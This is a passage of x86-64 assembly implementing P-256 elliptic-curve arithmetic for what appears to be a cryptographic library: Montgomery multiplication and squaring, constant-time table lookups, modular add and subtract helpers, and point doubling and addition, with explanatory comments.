movq %r8,%rbx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%rdx
sbbq %r15,%r9
sbbq $0,%r10
cmovcq %rcx,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rbx,%r8
movq %r13,8(%rdi)
cmovcq %rdx,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.globl _ecp_nistz256_sqr_mont_nohw
.private_extern _ecp_nistz256_sqr_mont_nohw
.p2align 5
_ecp_nistz256_sqr_mont_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$sqr_body:
movq 0(%rsi),%rax
movq 8(%rsi),%r14
movq 16(%rsi),%r15
movq 24(%rsi),%r8
call __ecp_nistz256_sqr_montq
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$sqr_epilogue:
ret
.p2align 5
__ecp_nistz256_sqr_montq:
movq %rax,%r13
mulq %r14
movq %rax,%r9
movq %r15,%rax
movq %rdx,%r10
mulq %r13
addq %rax,%r10
movq %r8,%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %r13
addq %rax,%r11
movq %r15,%rax
adcq $0,%rdx
movq %rdx,%r12
mulq %r14
addq %rax,%r11
movq %r8,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq %r14
addq %rax,%r12
movq %r8,%rax
adcq $0,%rdx
addq %rbp,%r12
movq %rdx,%r13
adcq $0,%r13
mulq %r15
xorq %r15,%r15
addq %rax,%r13
movq 0(%rsi),%rax
movq %rdx,%r14
adcq $0,%r14
addq %r9,%r9
adcq %r10,%r10
adcq %r11,%r11
adcq %r12,%r12
adcq %r13,%r13
adcq %r14,%r14
adcq $0,%r15
mulq %rax
movq %rax,%r8
movq 8(%rsi),%rax
movq %rdx,%rcx
mulq %rax
addq %rcx,%r9
adcq %rax,%r10
movq 16(%rsi),%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq %rax
addq %rcx,%r11
adcq %rax,%r12
movq 24(%rsi),%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq %rax
addq %rcx,%r13
adcq %rax,%r14
movq %r8,%rax
adcq %rdx,%r15
movq L$poly+8(%rip),%rsi
movq L$poly+24(%rip),%rbp
movq %r8,%rcx
shlq $32,%r8
mulq %rbp
shrq $32,%rcx
addq %r8,%r9
adcq %rcx,%r10
adcq %rax,%r11
movq %r9,%rax
adcq $0,%rdx
movq %r9,%rcx
shlq $32,%r9
movq %rdx,%r8
mulq %rbp
shrq $32,%rcx
addq %r9,%r10
adcq %rcx,%r11
adcq %rax,%r8
movq %r10,%rax
adcq $0,%rdx
movq %r10,%rcx
shlq $32,%r10
movq %rdx,%r9
mulq %rbp
shrq $32,%rcx
addq %r10,%r11
adcq %rcx,%r8
adcq %rax,%r9
movq %r11,%rax
adcq $0,%rdx
movq %r11,%rcx
shlq $32,%r11
movq %rdx,%r10
mulq %rbp
shrq $32,%rcx
addq %r11,%r8
adcq %rcx,%r9
adcq %rax,%r10
adcq $0,%rdx
xorq %r11,%r11
addq %r8,%r12
adcq %r9,%r13
movq %r12,%r8
adcq %r10,%r14
adcq %rdx,%r15
movq %r13,%r9
adcq $0,%r11
subq $-1,%r12
movq %r14,%r10
sbbq %rsi,%r13
sbbq $0,%r14
movq %r15,%rcx
sbbq %rbp,%r15
sbbq $0,%r11
cmovcq %r8,%r12
cmovcq %r9,%r13
movq %r12,0(%rdi)
cmovcq %r10,%r14
movq %r13,8(%rdi)
cmovcq %rcx,%r15
movq %r14,16(%rdi)
movq %r15,24(%rdi)
ret
.globl _ecp_nistz256_mul_mont_adx
.private_extern _ecp_nistz256_mul_mont_adx
.p2align 5
_ecp_nistz256_mul_mont_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$mulx_body:
movq %rdx,%rbx
movq 0(%rdx),%rdx
movq 0(%rsi),%r9
movq 8(%rsi),%r10
movq 16(%rsi),%r11
movq 24(%rsi),%r12
leaq -128(%rsi),%rsi
call __ecp_nistz256_mul_montx
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$mulx_epilogue:
ret
.p2align 5
__ecp_nistz256_mul_montx:
mulxq %r9,%r8,%r9
mulxq %r10,%rcx,%r10
movq $32,%r14
xorq %r13,%r13
mulxq %r11,%rbp,%r11
movq L$poly+24(%rip),%r15
adcq %rcx,%r9
mulxq %r12,%rcx,%r12
movq %r8,%rdx
adcq %rbp,%r10
shlxq %r14,%r8,%rbp
adcq %rcx,%r11
shrxq %r14,%r8,%rcx
adcq $0,%r12
addq %rbp,%r9
adcq %rcx,%r10
mulxq %r15,%rcx,%rbp
movq 8(%rbx),%rdx
adcq %rcx,%r11
adcq %rbp,%r12
adcq $0,%r13
xorq %r8,%r8
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 24+128(%rsi),%rcx,%rbp
movq %r9,%rdx
adcxq %rcx,%r12
shlxq %r14,%r9,%rcx
adoxq %rbp,%r13
shrxq %r14,%r9,%rbp
adcxq %r8,%r13
adoxq %r8,%r8
adcq $0,%r8
addq %rcx,%r10
adcq %rbp,%r11
mulxq %r15,%rcx,%rbp
movq 16(%rbx),%rdx
adcq %rcx,%r12
adcq %rbp,%r13
adcq $0,%r8
xorq %r9,%r9
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 24+128(%rsi),%rcx,%rbp
movq %r10,%rdx
adcxq %rcx,%r13
shlxq %r14,%r10,%rcx
adoxq %rbp,%r8
shrxq %r14,%r10,%rbp
adcxq %r9,%r8
adoxq %r9,%r9
adcq $0,%r9
addq %rcx,%r11
adcq %rbp,%r12
mulxq %r15,%rcx,%rbp
movq 24(%rbx),%rdx
adcq %rcx,%r13
adcq %rbp,%r8
adcq $0,%r9
xorq %r10,%r10
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r13
adoxq %rbp,%r8
mulxq 24+128(%rsi),%rcx,%rbp
movq %r11,%rdx
adcxq %rcx,%r8
shlxq %r14,%r11,%rcx
adoxq %rbp,%r9
shrxq %r14,%r11,%rbp
adcxq %r10,%r9
adoxq %r10,%r10
adcq $0,%r10
addq %rcx,%r12
adcq %rbp,%r13
mulxq %r15,%rcx,%rbp
movq %r12,%rbx
movq L$poly+8(%rip),%r14
adcq %rcx,%r8
movq %r13,%rdx
adcq %rbp,%r9
adcq $0,%r10
xorl %eax,%eax
movq %r8,%rcx
sbbq $-1,%r12
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%rbp
sbbq %r15,%r9
sbbq $0,%r10
cmovcq %rbx,%r12
cmovcq %rdx,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %rbp,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.globl _ecp_nistz256_sqr_mont_adx
.private_extern _ecp_nistz256_sqr_mont_adx
.p2align 5
_ecp_nistz256_sqr_mont_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$sqrx_body:
movq 0(%rsi),%rdx
movq 8(%rsi),%r14
movq 16(%rsi),%r15
movq 24(%rsi),%r8
leaq -128(%rsi),%rsi
call __ecp_nistz256_sqr_montx
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$sqrx_epilogue:
ret
.p2align 5
__ecp_nistz256_sqr_montx:
mulxq %r14,%r9,%r10
mulxq %r15,%rcx,%r11
xorl %eax,%eax
adcq %rcx,%r10
mulxq %r8,%rbp,%r12
movq %r14,%rdx
adcq %rbp,%r11
adcq $0,%r12
xorq %r13,%r13
mulxq %r15,%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq %r8,%rcx,%rbp
movq %r15,%rdx
adcxq %rcx,%r12
adoxq %rbp,%r13
adcq $0,%r13
mulxq %r8,%rcx,%r14
movq 0+128(%rsi),%rdx
xorq %r15,%r15
adcxq %r9,%r9
adoxq %rcx,%r13
adcxq %r10,%r10
adoxq %r15,%r14
mulxq %rdx,%r8,%rbp
movq 8+128(%rsi),%rdx
adcxq %r11,%r11
adoxq %rbp,%r9
adcxq %r12,%r12
mulxq %rdx,%rcx,%rax
movq 16+128(%rsi),%rdx
adcxq %r13,%r13
adoxq %rcx,%r10
adcxq %r14,%r14
.byte 0x67
mulxq %rdx,%rcx,%rbp
movq 24+128(%rsi),%rdx
adoxq %rax,%r11
adcxq %r15,%r15
adoxq %rcx,%r12
movq $32,%rsi
adoxq %rbp,%r13
.byte 0x67,0x67
mulxq %rdx,%rcx,%rax
movq L$poly+24(%rip),%rdx
adoxq %rcx,%r14
shlxq %rsi,%r8,%rcx
adoxq %rax,%r15
shrxq %rsi,%r8,%rax
movq %rdx,%rbp
addq %rcx,%r9
adcq %rax,%r10
mulxq %r8,%rcx,%r8
adcq %rcx,%r11
shlxq %rsi,%r9,%rcx
adcq $0,%r8
shrxq %rsi,%r9,%rax
addq %rcx,%r10
adcq %rax,%r11
mulxq %r9,%rcx,%r9
adcq %rcx,%r8
shlxq %rsi,%r10,%rcx
adcq $0,%r9
shrxq %rsi,%r10,%rax
addq %rcx,%r11
adcq %rax,%r8
mulxq %r10,%rcx,%r10
adcq %rcx,%r9
shlxq %rsi,%r11,%rcx
adcq $0,%r10
shrxq %rsi,%r11,%rax
addq %rcx,%r8
adcq %rax,%r9
mulxq %r11,%rcx,%r11
adcq %rcx,%r10
adcq $0,%r11
xorq %rdx,%rdx
addq %r8,%r12
movq L$poly+8(%rip),%rsi
adcq %r9,%r13
movq %r12,%r8
adcq %r10,%r14
adcq %r11,%r15
movq %r13,%r9
adcq $0,%rdx
subq $-1,%r12
movq %r14,%r10
sbbq %rsi,%r13
sbbq $0,%r14
movq %r15,%r11
sbbq %rbp,%r15
sbbq $0,%rdx
cmovcq %r8,%r12
cmovcq %r9,%r13
movq %r12,0(%rdi)
cmovcq %r10,%r14
movq %r13,8(%rdi)
cmovcq %r11,%r15
movq %r14,16(%rdi)
movq %r15,24(%rdi)
ret
.globl _ecp_nistz256_select_w5_nohw
.private_extern _ecp_nistz256_select_w5_nohw
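// Constant-time table lookup: all 16 entries (96 bytes each) are read
// and ANDed with a pcmpeqd-generated all-ones/all-zeros mask, so the
// memory access pattern is independent of the secret index in %edx.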
.p2align 5
_ecp_nistz256_select_w5_nohw:
_CET_ENDBR
movdqa L$One(%rip),%xmm0
movd %edx,%xmm1
pxor %xmm2,%xmm2
pxor %xmm3,%xmm3
pxor %xmm4,%xmm4
pxor %xmm5,%xmm5
pxor %xmm6,%xmm6
pxor %xmm7,%xmm7
movdqa %xmm0,%xmm8
pshufd $0,%xmm1,%xmm1
movq $16,%rax
L$select_loop_sse_w5:
movdqa %xmm8,%xmm15
paddd %xmm0,%xmm8
pcmpeqd %xmm1,%xmm15
movdqa 0(%rsi),%xmm9
movdqa 16(%rsi),%xmm10
movdqa 32(%rsi),%xmm11
movdqa 48(%rsi),%xmm12
movdqa 64(%rsi),%xmm13
movdqa 80(%rsi),%xmm14
leaq 96(%rsi),%rsi
pand %xmm15,%xmm9
pand %xmm15,%xmm10
por %xmm9,%xmm2
pand %xmm15,%xmm11
por %xmm10,%xmm3
pand %xmm15,%xmm12
por %xmm11,%xmm4
pand %xmm15,%xmm13
por %xmm12,%xmm5
pand %xmm15,%xmm14
por %xmm13,%xmm6
por %xmm14,%xmm7
decq %rax
jnz L$select_loop_sse_w5
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqu %xmm4,32(%rdi)
movdqu %xmm5,48(%rdi)
movdqu %xmm6,64(%rdi)
movdqu %xmm7,80(%rdi)
ret
L$SEH_end_ecp_nistz256_select_w5_nohw:
.globl _ecp_nistz256_select_w7_nohw
.private_extern _ecp_nistz256_select_w7_nohw
.p2align 5
_ecp_nistz256_select_w7_nohw:
_CET_ENDBR
movdqa L$One(%rip),%xmm8
movd %edx,%xmm1
pxor %xmm2,%xmm2
pxor %xmm3,%xmm3
pxor %xmm4,%xmm4
pxor %xmm5,%xmm5
movdqa %xmm8,%xmm0
pshufd $0,%xmm1,%xmm1
movq $64,%rax
L$select_loop_sse_w7:
movdqa %xmm8,%xmm15
paddd %xmm0,%xmm8
movdqa 0(%rsi),%xmm9
movdqa 16(%rsi),%xmm10
pcmpeqd %xmm1,%xmm15
movdqa 32(%rsi),%xmm11
movdqa 48(%rsi),%xmm12
leaq 64(%rsi),%rsi
pand %xmm15,%xmm9
pand %xmm15,%xmm10
por %xmm9,%xmm2
pand %xmm15,%xmm11
por %xmm10,%xmm3
pand %xmm15,%xmm12
por %xmm11,%xmm4
prefetcht0 255(%rsi)
por %xmm12,%xmm5
decq %rax
jnz L$select_loop_sse_w7
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqu %xmm4,32(%rdi)
movdqu %xmm5,48(%rdi)
ret
L$SEH_end_ecp_nistz256_select_w7_nohw:
.globl _ecp_nistz256_select_w5_avx2
.private_extern _ecp_nistz256_select_w5_avx2
.p2align 5
_ecp_nistz256_select_w5_avx2:
_CET_ENDBR
vzeroupper
vmovdqa L$Two(%rip),%ymm0
vpxor %ymm2,%ymm2,%ymm2
vpxor %ymm3,%ymm3,%ymm3
vpxor %ymm4,%ymm4,%ymm4
vmovdqa L$One(%rip),%ymm5
vmovdqa L$Two(%rip),%ymm10
vmovd %edx,%xmm1
vpermd %ymm1,%ymm2,%ymm1
movq $8,%rax
L$select_loop_avx2_w5:
vmovdqa 0(%rsi),%ymm6
vmovdqa 32(%rsi),%ymm7
vmovdqa 64(%rsi),%ymm8
vmovdqa 96(%rsi),%ymm11
vmovdqa 128(%rsi),%ymm12
vmovdqa 160(%rsi),%ymm13
vpcmpeqd %ymm1,%ymm5,%ymm9
vpcmpeqd %ymm1,%ymm10,%ymm14
vpaddd %ymm0,%ymm5,%ymm5
vpaddd %ymm0,%ymm10,%ymm10
leaq 192(%rsi),%rsi
vpand %ymm9,%ymm6,%ymm6
vpand %ymm9,%ymm7,%ymm7
vpand %ymm9,%ymm8,%ymm8
vpand %ymm14,%ymm11,%ymm11
vpand %ymm14,%ymm12,%ymm12
vpand %ymm14,%ymm13,%ymm13
vpxor %ymm6,%ymm2,%ymm2
vpxor %ymm7,%ymm3,%ymm3
vpxor %ymm8,%ymm4,%ymm4
vpxor %ymm11,%ymm2,%ymm2
vpxor %ymm12,%ymm3,%ymm3
vpxor %ymm13,%ymm4,%ymm4
decq %rax
jnz L$select_loop_avx2_w5
vmovdqu %ymm2,0(%rdi)
vmovdqu %ymm3,32(%rdi)
vmovdqu %ymm4,64(%rdi)
vzeroupper
ret
L$SEH_end_ecp_nistz256_select_w5_avx2:
.globl _ecp_nistz256_select_w7_avx2
.private_extern _ecp_nistz256_select_w7_avx2
.p2align 5
_ecp_nistz256_select_w7_avx2:
_CET_ENDBR
vzeroupper
vmovdqa L$Three(%rip),%ymm0
vpxor %ymm2,%ymm2,%ymm2
vpxor %ymm3,%ymm3,%ymm3
vmovdqa L$One(%rip),%ymm4
vmovdqa L$Two(%rip),%ymm8
vmovdqa L$Three(%rip),%ymm12
vmovd %edx,%xmm1
vpermd %ymm1,%ymm2,%ymm1
movq $21,%rax
L$select_loop_avx2_w7:
vmovdqa 0(%rsi),%ymm5
vmovdqa 32(%rsi),%ymm6
vmovdqa 64(%rsi),%ymm9
vmovdqa 96(%rsi),%ymm10
vmovdqa 128(%rsi),%ymm13
vmovdqa 160(%rsi),%ymm14
vpcmpeqd %ymm1,%ymm4,%ymm7
vpcmpeqd %ymm1,%ymm8,%ymm11
vpcmpeqd %ymm1,%ymm12,%ymm15
vpaddd %ymm0,%ymm4,%ymm4
vpaddd %ymm0,%ymm8,%ymm8
vpaddd %ymm0,%ymm12,%ymm12
leaq 192(%rsi),%rsi
vpand %ymm7,%ymm5,%ymm5
vpand %ymm7,%ymm6,%ymm6
vpand %ymm11,%ymm9,%ymm9
vpand %ymm11,%ymm10,%ymm10
vpand %ymm15,%ymm13,%ymm13
vpand %ymm15,%ymm14,%ymm14
vpxor %ymm5,%ymm2,%ymm2
vpxor %ymm6,%ymm3,%ymm3
vpxor %ymm9,%ymm2,%ymm2
vpxor %ymm10,%ymm3,%ymm3
vpxor %ymm13,%ymm2,%ymm2
vpxor %ymm14,%ymm3,%ymm3
decq %rax
jnz L$select_loop_avx2_w7
vmovdqa 0(%rsi),%ymm5
vmovdqa 32(%rsi),%ymm6
vpcmpeqd %ymm1,%ymm4,%ymm7
vpand %ymm7,%ymm5,%ymm5
vpand %ymm7,%ymm6,%ymm6
vpxor %ymm5,%ymm2,%ymm2
vpxor %ymm6,%ymm3,%ymm3
vmovdqu %ymm2,0(%rdi)
vmovdqu %ymm3,32(%rdi)
vzeroupper
ret
L$SEH_end_ecp_nistz256_select_w7_avx2:
.p2align 5
__ecp_nistz256_add_toq:
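// r = a + b mod p, where p = 2^256 - 2^224 + 2^192 + 2^96 - 1 is the
// P-256 prime. Add with carry, then subtract p (limbs: -1 via the
// $-1 immediate, %r14, 0, %r15); the cmovc chain keeps the unreduced
// sum when the subtraction borrows.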
xorq %r11,%r11
addq 0(%rbx),%r12
adcq 8(%rbx),%r13
movq %r12,%rax
adcq 16(%rbx),%r8
adcq 24(%rbx),%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.p2align 5
__ecp_nistz256_sub_fromq:
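// r = a - b mod p. Subtract with borrow, then add p back; the
// sbbq %r11,%r11 materializes the borrow as a 0/-1 mask, and the
// cmovz chain keeps the uncorrected difference when no borrow
// occurred.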
subq 0(%rbx),%r12
sbbq 8(%rbx),%r13
movq %r12,%rax
sbbq 16(%rbx),%r8
sbbq 24(%rbx),%r9
movq %r13,%rbp
sbbq %r11,%r11
addq $-1,%r12
movq %r8,%rcx
adcq %r14,%r13
adcq $0,%r8
movq %r9,%r10
adcq %r15,%r9
testq %r11,%r11
cmovzq %rax,%r12
cmovzq %rbp,%r13
movq %r12,0(%rdi)
cmovzq %rcx,%r8
movq %r13,8(%rdi)
cmovzq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.p2align 5
__ecp_nistz256_subq:
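// Same reduction pattern as __ecp_nistz256_sub_fromq, but with the
// minuend in %rax/%rbp/%rcx/%r10 and the result left in registers
// (%r12,%r13,%r8,%r9) rather than stored; cmovnz applies the +p
// correction only when the subtraction borrowed.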
subq %r12,%rax
sbbq %r13,%rbp
movq %rax,%r12
sbbq %r8,%rcx
sbbq %r9,%r10
movq %rbp,%r13
sbbq %r11,%r11
addq $-1,%rax
movq %rcx,%r8
adcq %r14,%rbp
adcq $0,%rcx
movq %r10,%r9
adcq %r15,%r10
testq %r11,%r11
cmovnzq %rax,%r12
cmovnzq %rbp,%r13
cmovnzq %rcx,%r8
cmovnzq %r10,%r9
ret
.p2align 5
__ecp_nistz256_mul_by_2q:
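// r = 2*a mod p: double via add-with-carry, then the same conditional
// subtraction of p as in __ecp_nistz256_add_toq.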
xorq %r11,%r11
addq %r12,%r12
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.globl _ecp_nistz256_point_double_nohw
.private_extern _ecp_nistz256_point_double_nohw
.p2align 5
_ecp_nistz256_point_double_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $160+8,%rsp
L$point_doubleq_body:
L$point_double_shortcutq:
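// Point doubling in Jacobian coordinates over P-256; the input point
// (X, Y, Z) sits at (%rsi) and the temporaries live in the 160-byte
// stack frame reserved above.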
movdqu 0(%rsi),%xmm0
movq %rsi,%rbx
movdqu 16(%rsi),%xmm1
movq 32+0(%rsi),%r12
movq 32+8(%rsi),%r13
movq 32+16(%rsi),%r8
movq 32+24(%rsi),%r9
movq L$poly+8(%rip),%r14
movq L$poly+24(%rip),%r15
movdqa %xmm0,96(%rsp)
movdqa %xmm1,96+16(%rsp)
leaq 32(%rdi),%r10
leaq 64(%rdi),%r11
.byte 102,72,15,110,199
.byte 102,73,15,110,202
.byte 102,73,15,110,211
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_by_2q
movq 64+0(%rsi),%rax
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
leaq 64-0(%rsi),%rsi
leaq 64(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 0+0(%rsp),%rax
movq 8+0(%rsp),%r14
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
leaq 0(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 32(%rbx),%rax
movq 64+0(%rbx),%r9
movq 64+8(%rbx),%r10
movq 64+16(%rbx),%r11
movq 64+24(%rbx),%r12
leaq 64-0(%rbx),%rsi
leaq 32(%rbx),%rbx
.byte 102,72,15,126,215
call __ecp_nistz256_mul_montq
call __ecp_nistz256_mul_by_2q
movq 96+0(%rsp),%r12
movq 96+8(%rsp),%r13
leaq 64(%rsp),%rbx
movq 96+16(%rsp),%r8
movq 96+24(%rsp),%r9
leaq 32(%rsp),%rdi
call __ecp_nistz256_add_toq
movq 96+0(%rsp),%r12
movq 96+8(%rsp),%r13
leaq 64(%rsp),%rbx
movq 96+16(%rsp),%r8
movq 96+24(%rsp),%r9
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 0+0(%rsp),%rax
movq 8+0(%rsp),%r14
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
.byte 102,72,15,126,207
call __ecp_nistz256_sqr_montq
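// Halve mod p: unconditionally compute x + p (carry into %r9, with
// %rsi and %rbp apparently holding p[1] and p[3] as left by the
// preceding __ecp_nistz256_sqr_montq), keep the original via cmovz
// when x was already even, then shift the five-word result right by
// one bit.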
xorq %r9,%r9
movq %r12,%rax
addq $-1,%r12
movq %r13,%r10
adcq %rsi,%r13
movq %r14,%rcx
adcq $0,%r14
movq %r15,%r8
adcq %rbp,%r15
adcq $0,%r9
xorq %rsi,%rsi
testq $1,%rax
cmovzq %rax,%r12
cmovzq %r10,%r13
cmovzq %rcx,%r14
cmovzq %r8,%r15
cmovzq %rsi,%r9
movq %r13,%rax
shrq $1,%r12
shlq $63,%rax
movq %r14,%r10
shrq $1,%r13
orq %rax,%r12
shlq $63,%r10
movq %r15,%rcx
shrq $1,%r14
orq %r10,%r13
shlq $63,%rcx
movq %r12,0(%rdi)
shrq $1,%r15
movq %r13,8(%rdi)
shlq $63,%r9
orq %rcx,%r14
orq %r9,%r15
movq %r14,16(%rdi)
movq %r15,24(%rdi)
movq 64(%rsp),%rax
leaq 64(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_by_2q
leaq 32(%rsp),%rbx
leaq 32(%rsp),%rdi
call __ecp_nistz256_add_toq
movq 96(%rsp),%rax
leaq 96(%rsp),%rbx
movq 0+0(%rsp),%r9
movq 8+0(%rsp),%r10
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r11
movq 24+0(%rsp),%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_by_2q
movq 0+32(%rsp),%rax
movq 8+32(%rsp),%r14
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r15
movq 24+32(%rsp),%r8
.byte 102,72,15,126,199
call __ecp_nistz256_sqr_montq
leaq 128(%rsp),%rbx
movq %r14,%r8
movq %r15,%r9
movq %rsi,%r14
movq %rbp,%r15
call __ecp_nistz256_sub_fromq
movq 0+0(%rsp),%rax
movq 0+8(%rsp),%rbp
movq 0+16(%rsp),%rcx
movq 0+24(%rsp),%r10
leaq 0(%rsp),%rdi
call __ecp_nistz256_subq
movq 32(%rsp),%rax
leaq 32(%rsp),%rbx
movq %r12,%r14
xorl %ecx,%ecx
movq %r12,0+0(%rsp)
movq %r13,%r10
movq %r13,0+8(%rsp)
cmovzq %r8,%r11
movq %r8,0+16(%rsp)
leaq 0-0(%rsp),%rsi
cmovzq %r9,%r12
movq %r9,0+24(%rsp)
movq %r14,%r9
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montq
.byte 102,72,15,126,203
.byte 102,72,15,126,207
call __ecp_nistz256_sub_fromq
leaq 160+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$point_doubleq_epilogue:
ret
.globl _ecp_nistz256_point_add_nohw
.private_extern _ecp_nistz256_point_add_nohw
.p2align 5
_ecp_nistz256_point_add_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $576+8,%rsp
L$point_addq_body:
movdqu 0(%rsi),%xmm0
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
movdqu 48(%rsi),%xmm3
movdqu 64(%rsi),%xmm4
movdqu 80(%rsi),%xmm5
movq %rsi,%rbx
movq %rdx,%rsi
movdqa %xmm0,384(%rsp)
movdqa %xmm1,384+16(%rsp)
movdqa %xmm2,416(%rsp)
movdqa %xmm3,416+16(%rsp)
movdqa %xmm4,448(%rsp)
movdqa %xmm5,448+16(%rsp)
por %xmm4,%xmm5
movdqu 0(%rsi),%xmm0
pshufd $0xb1,%xmm5,%xmm3
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
por %xmm3,%xmm5
movdqu 48(%rsi),%xmm3
movq 64+0(%rsi),%rax
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
movdqa %xmm0,480(%rsp)
pshufd $0x1e,%xmm5,%xmm4
movdqa %xmm1,480+16(%rsp)
movdqu 64(%rsi),%xmm0
movdqu 80(%rsi),%xmm1
movdqa %xmm2,512(%rsp)
movdqa %xmm3,512+16(%rsp)
por %xmm4,%xmm5
pxor %xmm4,%xmm4
por %xmm0,%xmm1
.byte 102,72,15,110,199
leaq 64-0(%rsi),%rsi
movq %rax,544+0(%rsp)
movq %r14,544+8(%rsp)
movq %r15,544+16(%rsp)
movq %r8,544+24(%rsp)
leaq 96(%rsp),%rdi
call __ecp_nistz256_sqr_montq
pcmpeqd %xmm4,%xmm5
pshufd $0xb1,%xmm1,%xmm4
por %xmm1,%xmm4
pshufd $0,%xmm5,%xmm5
pshufd $0x1e,%xmm4,%xmm3
por %xmm3,%xmm4
pxor %xmm3,%xmm3
pcmpeqd %xmm3,%xmm4
pshufd $0,%xmm4,%xmm4
movq 64+0(%rbx),%rax
movq 64+8(%rbx),%r14
movq 64+16(%rbx),%r15
movq 64+24(%rbx),%r8
.byte 102,72,15,110,203
leaq 64-0(%rbx),%rsi
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 544(%rsp),%rax
leaq 544(%rsp),%rbx
movq 0+96(%rsp),%r9
movq 8+96(%rsp),%r10
leaq 0+96(%rsp),%rsi
movq 16+96(%rsp),%r11
movq 24+96(%rsp),%r12
leaq 224(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 448(%rsp),%rax
leaq 448(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 416(%rsp),%rax
leaq 416(%rsp),%rbx
movq 0+224(%rsp),%r9
movq 8+224(%rsp),%r10
leaq 0+224(%rsp),%rsi
